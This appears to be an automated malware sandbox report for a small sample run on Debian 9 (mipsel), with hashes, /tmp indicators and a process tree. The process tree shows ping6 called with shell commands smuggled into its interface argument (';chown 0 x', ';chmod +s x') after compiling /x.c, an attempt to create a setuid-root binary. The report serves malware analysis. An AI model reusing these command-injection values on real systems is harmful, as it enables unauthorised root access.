c53990b7cf230f69dae913a3cd9f7db84d159a41d0c20cab487605f74c7d24a1

Analysis

max time kernel
9s
platform
debian-9_mipsel
resource
debian9-mipsel-20231222-en
resource tags

arch:mipselimage:debian9-mipsel-20231222-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
22/12/2023, 12:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

91a163c458d1d02767a07b2fd8331d32
Size

795B
MD5

91a163c458d1d02767a07b2fd8331d32
SHA1

0877f4381147d9636bcdc4cb312f09016d883866
SHA256

c53990b7cf230f69dae913a3cd9f7db84d159a41d0c20cab487605f74c7d24a1
SHA512

b22a9d40adc4925c753b19eda4f9165bd3c64f6e49b04a0cc86e556508e19c59dbb3bc53006f0853cebc46f26f2947ed18f42b506444351b9d3108ceea8e9544

Score

3^/10

Malware Config

Signatures

Writes file to tmp directory 9 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/ccRW9OxO.s	gcc
File opened for modification	/tmp/ccRW9OxO.s	cc1
File opened for modification	/tmp/cc2DZkin.o	gcc
File opened for modification	/tmp/cc2DZkin.o	as
File opened for modification	/tmp/ccNtaUR8.res	gcc
File opened for modification	/tmp/cciwqp63.c	collect2
File opened for modification	/tmp/ccaeScdY.o	collect2
File opened for modification	/tmp/cc4M25dS.ld	collect2
File opened for modification	/tmp/ccCqDGsM.le	collect2

/tmp/91a163c458d1d02767a07b2fd8331d32
/tmp/91a163c458d1d02767a07b2fd8331d32
1⤵
PID:716
- /bin/ping6
  /bin/ping6 -I ";chmod o+w ." 195.117.3.59
  2⤵
  PID:719
- /bin/sleep
  sleep 1
  2⤵
  PID:720
- /bin/cat
  cat
  2⤵
  PID:740
- /usr/bin/gcc
  gcc /x.c -o /x
  2⤵
  - Writes file to tmp directory
  PID:741
- - /usr/lib/gcc/mipsel-linux-gnu/6/cc1
    /usr/lib/gcc/mipsel-linux-gnu/6/cc1 -quiet -imultiarch mipsel-linux-gnu /x.c -mel -quiet -dumpbase x.c "-march=mips32r2" -mfpxx -mllsc -mno-lxc1-sxc1 -mno-madd4 -mips32r2 "-mabi=32" -auxbase x -o /tmp/ccRW9OxO.s
    3⤵
    - Writes file to tmp directory
    PID:742
- - /usr/local/sbin/as
    as -EL -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/cc2DZkin.o /tmp/ccRW9OxO.s
    3⤵
    PID:743
- - /usr/local/bin/as
    as -EL -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/cc2DZkin.o /tmp/ccRW9OxO.s
    3⤵
    PID:743
- - /usr/sbin/as
    as -EL -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/cc2DZkin.o /tmp/ccRW9OxO.s
    3⤵
    PID:743
- - /usr/bin/as
    as -EL -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/cc2DZkin.o /tmp/ccRW9OxO.s
    3⤵
    - Writes file to tmp directory
    PID:743
- - /usr/lib/gcc/mipsel-linux-gnu/6/collect2
    /usr/lib/gcc/mipsel-linux-gnu/6/collect2 -plugin /usr/lib/gcc/mipsel-linux-gnu/6/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/mipsel-linux-gnu/6/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccNtaUR8.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "--sysroot=/" --build-id --eh-frame-hdr -EL -mips32r2 -dynamic-linker /lib/ld.so.1 -melf32ltsmip -pie -o /x /usr/lib/gcc/mipsel-linux-gnu/6/../../../mipsel-linux-gnu/Scrt1.o /usr/lib/gcc/mipsel-linux-gnu/6/../../../mipsel-linux-gnu/crti.o /usr/lib/gcc/mipsel-linux-gnu/6/crtbeginS.o -L/usr/lib/gcc/mipsel-linux-gnu/6 -L/usr/lib/gcc/mipsel-linux-gnu/6/../../../mipsel-linux-gnu -L/usr/lib/gcc/mipsel-linux-gnu/6/../../../../lib -L/lib/mipsel-linux-gnu -L/lib/../lib -L/usr/lib/mipsel-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/mipsel-linux-gnu/6/../../.. /tmp/cc2DZkin.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/mipsel-linux-gnu/6/crtendS.o /usr/lib/gcc/mipsel-linux-gnu/6/../../../mipsel-linux-gnu/crtn.o
    3⤵
    - Writes file to tmp directory
    PID:744
  - - /usr/bin/ld
      /usr/bin/ld -plugin /usr/lib/gcc/mipsel-linux-gnu/6/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/mipsel-linux-gnu/6/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccNtaUR8.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "--sysroot=/" --build-id --eh-frame-hdr -EL -mips32r2 -dynamic-linker /lib/ld.so.1 -melf32ltsmip -pie -o /x /usr/lib/gcc/mipsel-linux-gnu/6/../../../mipsel-linux-gnu/Scrt1.o /usr/lib/gcc/mipsel-linux-gnu/6/../../../mipsel-linux-gnu/crti.o /usr/lib/gcc/mipsel-linux-gnu/6/crtbeginS.o -L/usr/lib/gcc/mipsel-linux-gnu/6 -L/usr/lib/gcc/mipsel-linux-gnu/6/../../../mipsel-linux-gnu -L/usr/lib/gcc/mipsel-linux-gnu/6/../../../../lib -L/lib/mipsel-linux-gnu -L/lib/../lib -L/usr/lib/mipsel-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/mipsel-linux-gnu/6/../../.. /tmp/cc2DZkin.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/mipsel-linux-gnu/6/crtendS.o /usr/lib/gcc/mipsel-linux-gnu/6/../../../mipsel-linux-gnu/crtn.o
      4⤵
      PID:745
- /bin/chmod
  chmod 755 /x
  2⤵
  PID:746
- /bin/ping6
  /bin/ping6 -I ";chown 0 x" 195.117.3.59
  2⤵
  PID:747
- /bin/sleep
  sleep 1
  2⤵
  PID:748
- /bin/sleep
  sleep 1
  2⤵
  PID:751
- /bin/ping6
  /bin/ping6 -I ";chmod +s x" 195.117.3.59
  2⤵
  PID:750

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/cc2DZkin.o

Filesize
1KB

MD5
c06670a5ad4d98d52854c219db58d833

SHA1
8877fa3a96000fb4eb21e3c7ff9f4b12e19ecbcd

SHA256
795836005ef6591b699fd9977c4f7cca9be73d260b1a12002dc34113ec07a9e6

SHA512
2fc4aa49ff1ea4763d0f9097618908b6239857f93d44ce5c42a7d8b95a5a4fbcdc7e3484d4d86981543b18deb3819744840fc0d9c1f0ae8ec75a1dec4c788ba5

Download Submit
/tmp/ccRW9OxO.s

Filesize
1KB

MD5
5c70231d21b9029f090853556a37df65

SHA1
1c29773c62fe8cbda3a9fb9f25eb39775b2235b7

SHA256
02cbd3604934835f5a65faa2a3a65f67a529b7ca5d0fe8f8c560a05ea9e9e118

SHA512
79dc8606c23376524ba72fedf23e3252ac461eaeb34202bfcd5cee9c217246c7ab069c5592d3b5fe8499bee9f34e7c2c6357d6ba9e5577605b9712da9a5ce3a8

Download Submit
/x

Filesize
6KB

MD5
1b4d8281e618641fe3c397faa93c9ccb

SHA1
8514d00eb3de80e72ac4a16edaaeb18b999dea59

SHA256
349b39591105b53350177d3ca8e0996d1d26404807bdc4e02b21a93b6cb90e06

SHA512
c7562a33ea5e206ad2f47c47928674a6e5597b7e0bf7417d4300e7fb295d9374c103b18602c5e054328f4ed6a5871c2066978fa684c6ce0cb7194cea17156157

Download Submit
/x.c

Filesize
118B

MD5
8bed3f332a5368c4744d87fd799421b6

SHA1
ae55a869d490182de0db03ab44acfff78d19737d

SHA256
bab5ce8d609c6305bd23f0e3117d727e5375112ec703def17ef76f58938122b7

SHA512
957633080b2f248ca933cc4011148a83095b66617c0ea0bea7a04c66b2530f09ef0a7f50dc6f9e86fd18dd3808cc782872ffdd7f67afa9cedcdc75e1cbc26f8e

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads